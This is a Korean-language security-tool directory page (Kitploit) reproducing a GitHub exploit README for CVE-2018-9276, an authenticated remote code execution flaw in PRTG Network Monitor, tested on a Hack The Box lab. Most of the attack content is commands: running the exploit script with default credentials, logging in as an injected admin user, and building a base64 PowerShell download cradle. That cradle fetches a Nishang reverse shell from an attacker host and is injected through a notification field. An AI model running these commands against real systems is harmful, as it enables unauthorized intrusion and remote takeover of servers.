Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2018-9276 — CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support) | Kitploit
도구/GitHubGitHub/alvinsmith-eroad/cve-2018-9276
Payload GenerationExploitationLateral MovementWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubalvinsmith-eroad/cve-2018-9276

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (Python3 support)

저장소 보기
25년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 리버스 셸 (Python3 지원)

종속성

  • Impacket (python3 버전)
  • Netcat
  • Msfvenom

사용법

root@kitploit:~
git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
  1. 익스플로잇을 수행하려면 자격 증명이 필요합니다. 기본 자격 증명 prtgadmin:prtgadmin을 시도해보세요. 데이터베이스나 로그를 확인하여 자격 증명을 얻는 것도 고려해볼 만합니다. https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
  2. 포트가 점유되지 않은 경우 --lport 445를 시도하세요.
  3. 코드에 몇 가지 꼬인 주석이 있습니다. 약간의 수정이 필요할 수 있습니다.
  4. 성공하기까지 몇 번의 시도가 필요할 수 있습니다. 대상 머신을 재부팅하는 것은 항상 좋은 선택입니다. 특히 페이로드가 어떤 영향을 줄 때 더욱 그렇습니다.

테스트 커버리지

HTB Netmon 박스

root@kitploit:~
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA362
Original Install Date:     2/3/2019, 7:05:45 AM
System Boot Time:          7/28/2021, 9:02:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC

크레딧

wildkindcc의 python2 버전에 큰 감사를 드립니다. https://github.com/wildkindcc/CVE-2018-9276

지식 확장

Metasploit 사용

https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/

원격 코드 실행

https://www.exploit-db.com/exploits/46527

https://github.com/chcx/PRTG-Network-Monitor-RCE

사용 예시

익스플로잇을 수행하려면 자격 증명이 필요합니다. 먼저 로그인하여 인증된 쿠키를 얻고 새 사용자를 추가합니다.

root@kitploit:~
./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"

// evil-winrm으로 새 사용자로 로그인
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
// 또는 psexec.py 대안
python3 /path/etc/impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.10

Screen Shot 2021-07-29 at 3 14 10 PM

새 사용자를 추가하지 않고 수동 익스플로잇 (고급)

크레딧은 HTB 공식 라이트업에 있음
POC: https://www.codewatch.org/blog/?p=453 더불어 SMB를 사용하여 리버스 셸 얻기: https://github.com/A1vinSmith/OSCP-PWK/wiki/Samba-SMB

사용자를 추가하지 않으려는 경우, 더 나은 OPSEC을 위해 리버스 셸을 얻을 수 있습니다. 그러나 HTML 인코딩으로 인해 많은 문자가 인코딩됩니다. PowerShell base64 실행을 사용하여 이를 우회할 수 있습니다. base64로 인코딩된 명령을 생성해야 합니다. 단, Windows에서 사용하는 인코딩인 UTF-16LE여야 합니다.

root@kitploit:~
❯ echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w0

SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

iconv를 사용하여 대상 인코딩으로 변환하고 Nishang의 이 리버스 셸을 실행합니다. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

스크립트를 다운로드하고 명령을 마지막 줄에 추가합니다.

root@kitploit:~
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.100 -Port 4444' >> Invoke-PowerShellTcp.ps1

이제 간단한 HTTP 서버를 시작하고 새 알림을 생성합니다.

root@kitploit:~
python3 -m http.server 80

Setup > Account Settings > Notifications -> 오른쪽 끝에 있는 "Add new notification"을 클릭합니다. Bell 버튼을 클릭하여 알림을 트리거합니다.

root@kitploit:~
abc.txt | powershell -enc SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

Screen Shot 2021-07-29 at 4 08 01 PM

도구 다운로드